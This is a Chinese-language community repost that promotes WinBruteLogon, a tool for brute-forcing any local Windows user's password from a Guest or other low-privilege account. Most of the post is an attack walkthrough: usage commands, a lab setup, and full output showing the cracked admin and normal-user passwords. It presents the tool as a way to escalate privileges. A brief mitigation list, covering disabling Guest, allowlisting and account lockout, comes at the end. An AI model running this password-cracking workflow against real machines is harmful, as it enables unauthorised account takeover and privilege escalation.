Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >神兵利器 - 在没有任何权限的情况下破解任何 Microsoft Windows 用户密码

神兵利器 - 在没有任何权限的情况下破解任何 Microsoft Windows 用户密码

作者头像
Khan安全团队
发布于 2022-04-02 03:08:08
发布于 2022-04-02 03:08:08
1.9K00
代码可运行
举报
文章被收录于专栏:Khan安全团队Khan安全团队
运行总次数:0
代码可运行

项目地址:https://github.com/DarkCoderSc/win-brute-logon

目标:Windows XP 到最新的 Windows 10 版本 (1909)

用法

词表文件

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
WinBruteLogon.exe -u <username> -w <wordlist_file>

标准输入词汇表

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
type <wordlist_file> | WinBruteLogon.exe -u <username> -

介绍

这个 PoC 更像是我所说的 Microsoft Windows 身份验证机制中的一个严重弱点,而不是一个漏洞。

最大的问题与缺乏执行此类操作所需的权限有关。

实际上,通过访客帐户(Microsoft Windows 上最受限制的帐户),您可以破解任何可用本地用户的密码。

使用命令找出哪些用户存在:net user

这个 PoC 使用多线程来加速进程并支持 32 位和 64 位。

PoC 测试场景(使用访客账户)

在 Windows 10 上测试

安装和配置新更新的 Windows 10 虚拟机或物理机。

在我的情况下,完整的 Windows 版本是:1909 (OS Build 18363.778)

以管理员身份登录并让我们创建两个不同的帐户:一个管理员和一个普通用户。两个用户都是本地用户。

/!\ 重要提示:我在演示中使用了 Guest 帐户,但这个 PoC 不仅限于 Guest 帐户,它适用于任何帐户/组(guest 用户/普通用户/admin 用户等...)

创建一个新的管理员用户

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
net user darkcodersc /add
net user darkcodersc trousers
net localgroup administrators darkcodersc /add

创建普通用户

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
net user HackMe /add
net user HackMe ozlq6qwm

创建一个新的访客帐户

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
net user GuestUser /add
net localgroup users GuestUser /delete
net localgroup guests GuestUser /add

开始攻击

从管理员帐户注销或重新启动计算机并登录到访客帐户。

将 PoC 可执行文件放在您作为访客用户可以访问的任何地方。

用法 :WinBruteLogon.exe -v -u <username> -w <wordlist_file>

-v是可选的,它设计了详细模式。

默认情况下,域名%USERDOMAIN%env var 指定的值。您可以使用选项指定自定义名称-d

破解第一个用户:(darkcodersc管理员)

提示(客人)>WinBruteLogon.exe -v -u darkcodersc -w 10k-most-common.txt

等待几秒钟以查看以下结果:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
[ .. ] Load 10k-most-common.txt file in memory...
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads...
[INFO] New "TWorker" Thread created with id=2260, handle=364
[INFO] New "TWorker" Thread created with id=3712, handle=532
[DONE] Done.
[ OK ] Password for username=[darkcodersc] and domain=[DESKTOP-0885FP1] found = [trousers]
[ .. ] Finalize and close worker threads...
[INFO] "TWorkers"(id=2260, handle=364) Thread successfully terminated.
[INFO] "TWorkers"(id=3712, handle=532) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06

破解第二个用户:(HackMe普通用户)

提示(客人)>WinBruteLogon.exe -v -u HackMe -w 10k-most-common.txt

等待几秒钟以查看以下结果:

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
[ .. ] Load 10k-most-common.txt file in memory...
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads...
[INFO] New "TWorker" Thread created with id=5748, handle=336
[INFO] New "TWorker" Thread created with id=4948, handle=140
[DONE] Done.
[ OK ] Password for username=[HackMe] and domain=[DESKTOP-0885FP1] found = [ozlq6qwm]
[ .. ] Finalize and close worker threads...
[INFO] "TWorkers"(id=5748, handle=336) Thread successfully terminated.
[INFO] "TWorkers"(id=4948, handle=140) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06
代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制

如果您获得了对低权限用户的访问权限,则可以破解更高权限用户的密码并提升您的权限。

修复:

  • 禁用来宾帐户(如果存在)。
  • 应用程序白名单。
  • 按照指南创建并保持密码强度高。将此应用于所有用户。

实施安全锁定策略(默认不存在)

打开secpol.msc然后转到Account Policies>并使用(1 到 999)之间的所需值Account Lockout Policy编辑值。Account lockout threshold

值表示锁定之前可能尝试的次数。

/!\ LockDown Policy 不适用于管理员帐户。此时,对管理员帐户(如果启用)的最佳保护是设置一个非常复杂的密码。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2022-02-25,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 Khan安全攻防实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
如何使用Win Brute Logon测试Windows账号的安全性
Win Brute Logon是一款功能强大的Windows用户账号安全测试工具,在该工具的帮助下,广大研究人员可以直接测试任意Windows用户账号的安全,包括来宾账号在内,而且不需要任何特殊权限。
FB客服
2022/04/11
9150
如何使用Win Brute Logon测试Windows账号的安全性
Windows系统安全 | Windows中的用户和组
用户帐户是对计算机用户身份的标识,本地用户帐户、密码存在本地计算机上,只对本机有效,存储在本地安全帐户数据库 SAM 中,文件路径:C:\Windows\System32\config\SAM ,对应的进程:lsass.exe 。通过本地用户和组,可以为用户和组分配权利和权限,从而限制用户和组执行某些操作的能力。
谢公子
2022/01/13
1.9K0
Windows系统安全 | Windows中的用户和组
windows用户和组
用户账号的认证 用户账号是对计算机用户身份标识,。每个使用计算机的人,必须凭借他的用户账号密码才能够进入计算机,进而访问计算机里面的资源。在计算机中存有一个叫SAM的数据库,当用户输入账号密码之后会与SAM数据中的密码进行验证,SAM路径为:
黑白天安全
2020/04/14
3K0
windows用户和组
神兵利器 - WPCracker WordPress暴力破解工具
你可以控制你想要执行的攻击力度,这将影响所需的攻击时间。该工具可以调整线程的数量,以及每个线程每次测试的密码批量有多大。但是,攻击力过大会导致受害者的服务器速度变慢。
Khan安全团队
2021/02/08
2K0
红队之windows用户和组
用户帐户是对计算机用户身份的标识,本地用户帐户、密码存在本地计算机上,只对本机有效,存储在本地安全帐户数据库 SAM 中,文件路径:C:\Windows\System32\config\SAM ,对应的进程:lsass.exe 。通过本地用户和组,可以为用户和组分配权利和权限,从而限制用户和组执行某些操作的能力。 不同的用户身份拥有不同的权限 每个用户包含一个名称和一个密码 用户帐户拥有唯一的安全标识符(Security Identifier,SID)
黑白天安全
2020/08/18
2K0
红队之windows用户和组
在没有 Mimikatz 的情况下操作用户密码
通过利用Mimikatz的 lsadump::setntlm和lsadump::changentlm函数,过去已经涵盖了这两个用例。虽然Mimikatz是最好的攻击工具之一,但我会尽量避免使用它,因为它是反病毒和 EDR 工具的高度目标。在这篇文章中,我将专门讨论用例 #2 — 为横向移动或权限提升重置密码。
Khan安全团队
2022/03/21
2.3K0
护网问题之——Windows入侵之后权限不够怎么办
net user administrator //查看administrator账户的信息
网e渗透安全部
2024/06/07
2460
护网问题之——Windows入侵之后权限不够怎么办
忘记windows7开机密码破解windows7登陆解决方案
点评:破解 windows 7登陆密码主要解决两个问题: 1.PE或DOS认不到硬盘2.net user 命令不成功SATA的硬盘可能会让你的PE找不到,方法是修改BIOS中的SATA设定,找到后把后面的AHCI改成RAD(好像是这个名,基本就是上下选择,选择不是AHCI的那个值),有些硬盘值可能
Enjoy233
2019/03/05
5.5K0
windows权限维持(二)
在一般用户权限下,通常是将要执行的后门程序或脚本路径填写到如下注册表的键值中HKCU\Software\Microsoft\Windows\CurrentVersion\Run,键名任意。普通权限即可运行
鸿鹄实验室
2021/04/15
1.7K0
windows权限维持(二)
Windows 权限提升
本篇内容是内网安全攻防:渗透测试实战指南时的阅读笔记,笔记大部分内容均来自此书,另外一部分来源于一些公开文档和非公开文档,参考链接中均有注明。
重生信息安全
2020/07/15
3.9K0
Windows 权限提升
Windows提权WiKi
Windows常用命令 命令 描述 systeminfo 打印系统信息 whoami 获得当前用户名 whoami /priv 当前帐户权限 ipconfig 网络配置信息 ipconfig /displaydns 显示DNS缓存 route print 打印出路由表 arp -a 打印arp表 hostname 主机名 net user 列出用户 net user UserName 关于用户的信息 net use \SMBPATH Pa$$w0rd /u:UserName 连接S
HACK学习
2019/08/06
1.5K0
权限提升分析及防御
本篇继续阅读学习《内网安全攻防:渗透测试实战指南》,是第四章权限提升分析及防御,本章主要分析了系统的内核溢出漏洞提权、利用Windows操作系统错误配置提权、利用组策略首选项提权、绕过UAC提权、令牌窃取及无凭证条件下的权限获取,并提出了相应的安全防范措施
中龙技术
2022/09/29
1.6K0
Linux SSH密码暴力破解技术及攻防实战
对于Linux操作系统来说,一般通过VNC、Teamviewer和SSH等工具来进行远程管理,SSH是 Secure Shell的缩写,由IETF的网络小组(Network Working Group)所制定;SSH 为建立在应用层基础上的安全协议。SSH 是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议。 利用SSH协议可以有效防止远程管理过程中的信息泄露问题。SSH客户端适用于多种平台,几乎所有UNIX平台—包括HP-UX、Linux、AIX、Solaris、Digital UNIX、Iri
FB客服
2018/02/24
9.5K0
Linux SSH密码暴力破解技术及攻防实战
内网中关于MS-SAMR协议的利用
我们虽然拿到了修改/重置密码的权限,但我们又不想直接修改目标用户的密码,因为这样用户在登录时就会发现自己的密码被修改,此时有两种情况:
红队蓝军
2024/05/17
3160
内网中关于MS-SAMR协议的利用
【权限提升】windows平台-提权项目&MSF&CS&溢出漏洞
Windows系统内置了许多本地用户组,这些用户组本身都已经被赋予一些权限(permissions),它们具有管理本地计算机或访问本地资源的权限。只要用户账户加入到这些本地组内,这回用户账户也将具备该组所拥有的权限。
没事就要多学习
2024/07/18
3780
【权限提升】windows平台-提权项目&MSF&CS&溢出漏洞
我所了解的内网渗透 - 内网渗透知识大总结
一般想知道哪一台是域控知道自己内网的DNS就可以了,一般域控安装都有安装DNS有些不止一台,其次是通过扫描获取开放端口为389机器或者使用NLTEST命令查看。最后就是各种网络查看查看域控是哪台主机
HACK学习
2019/08/06
4.4K0
我所了解的内网渗透 - 内网渗透知识大总结
Protected Process Light (PPL) Attack
首先,PPL表示Protected Process Light,但在此之前,只有Protected Processes。受保护进程的概念是随Windows Vista / Server 2008引入的,其目的不是保护您的数据或凭据。其最初目标是保护媒体内容并遵守DRM(数字版权管理)要求。Microsoft 开发了这种机制,以便您的媒体播放器可以读取例如蓝光,同时防止您复制其内容。当时的要求是镜像文件(即可执行文件)必须使用特殊的 Windows Media 证书进行数字签名(如Windows Internals的“受保护的进程”部分中所述
黑白天安全
2022/05/31
2.1K0
Protected Process Light (PPL) Attack
横向渗透方法小结
第三方通用组件漏洞: struts、thinkphp、jboss、ganglia、zabbix等
中龙技术
2022/09/29
2.3K0
【内网渗透】域渗透实战之Monteverde
这是一组逻辑默认权限,但问题在于 TokenCache.dat 文件是一个包含当前会话的 AccessKey 的明文 JSON 文件。
亿人安全
2023/10/27
7360
【内网渗透】域渗透实战之Monteverde
针对校园某服务器的一次渗透测试
由于是对内网直接进行大扫描,所以直接判断这不仅是一个 Web 服务器(多个),同时还运行着 FTP、数据库。
HACK学习
2019/08/30
5.6K1
针对校园某服务器的一次渗透测试
相关推荐
如何使用Win Brute Logon测试Windows账号的安全性
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验